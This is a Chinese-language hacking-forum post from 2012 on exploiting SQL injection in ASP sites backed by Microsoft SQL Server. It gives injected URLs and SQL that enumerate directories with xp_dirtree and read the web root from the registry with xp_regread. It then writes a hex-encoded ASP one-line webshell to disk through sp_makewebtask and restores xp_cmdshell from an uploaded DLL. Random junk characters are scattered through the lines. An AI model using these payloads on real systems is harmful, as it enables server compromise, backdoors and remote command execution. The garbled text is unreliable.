找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2153|回复: 0
打印 上一主题 下一主题

MSsqlL注入取得网站路径最好的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:20:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好,我们exec master..xp_dirtree'd:/test') t  y) ^* u4 R" Z$ h
假设我们在test里有两个文件夹test1和test2在test1里又有test3* [& @/ M+ y9 b( Z
结果显示
0 g" ^4 c# Z4 [+ K7 }
7 a* T0 a5 E) w& F. n/ f* D" a5 asubdirectory depth5 l! X* k) A8 |8 ^( Q  z
test1 1
4 u8 p# ]4 X& \( p3 ]4 d0 V3 ptest3 2% Q7 B. ]. O0 j( D+ t  B
test2 1
  l" t4 _5 n. i! N4 Z# q% X% q, x+ i( ]: Y% o, \* B
哈哈发现没有那个depth就是目录的级数  p8 T6 E* {+ ^" C( q
ok了,知道怎么办了吧  n7 H( ^0 R! W% [; ~

2 s, {$ F" P/ U; f: X& i3 y- ?http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
8 C; @  _* V$ m1 qhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- : t3 {7 w6 B3 R5 Z1 Y6 J6 }
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-  L/ h, K) }0 p, `& o9 j/ h. ^8 i
/ t5 @  n. F2 H4 Z( i  E- ~8 }1 [
只要加上id=1,就是第一级目录 。
; q9 Q1 |! A% |" m1 |% F. {# c" ?
2 u) K3 r, l5 Z# ^0 V
通过注册表读网站路径:
, F  U7 S. V& y, y; g1 q( n
: |$ N( }) |# J! C6 i1.;create table [dbo].[cyfd] ([gyfd][char](255));/ l5 M# A( a( v$ k

+ C0 Q3 p/ v  Q0 ?; L2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--0 @* {2 i. b- b- U5 m! P2 `7 f
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
. A! ]7 e* t. j7 z5 K% b6 }7 k! E& W% t# a  [
3.and 1=(select count(*) from 临时表 where 临时字段名>1)4 ^. s) [+ c# W) u
and 1=(select count(*) from cyfd where gyfd > 1)
, A  @2 s9 s" w2 t9 t6 L: p这样IE报错,就把刚才插进去的Web路径的值报出来了  D2 A  `' J) U4 |; v6 e7 |

7 }' l: I' P6 d! Z$ b. S4.drop table cyfd;-- 删除临时表7 @8 ?2 V; s' [0 y' `' d( f
2 z1 G6 a7 I, E, \1 n  p
获得webshell方法:5 W1 I7 x3 F4 R, ~( _
1.create table cmd (a image)-- \**cmd是创建的临时表
+ B( n! Q) a0 s3 L
' @' e- e+ a7 Z2 Z0 S( @# `2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
& {1 V3 v3 F$ C
6 D1 j+ s6 |1 }; q1 g) M' P  w3 C& Z# d. @# c8 d  x) l
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
5 C% H9 S. A6 M! ?4 v+ iEXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
4 C; O$ O* [% R) U6 h$ v. Y
" l4 j. U& d( S( U5 ?6 E' l4.drop table cmd;-- 删除cmd临时表& }( Y  u5 S$ O
7 M" s# h2 G3 ?  ^4 p
恢复xp_cmdshell方法之一:
# g) E8 e  W" }- ?% [我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
, T2 a# T. ^$ y5 {. Mhttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
6 Q* z! P  K/ |8 I- I恢复,支持绝对路径的恢复哦。:): g' {( C. @7 z- ^8 ~1 Q5 c% ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表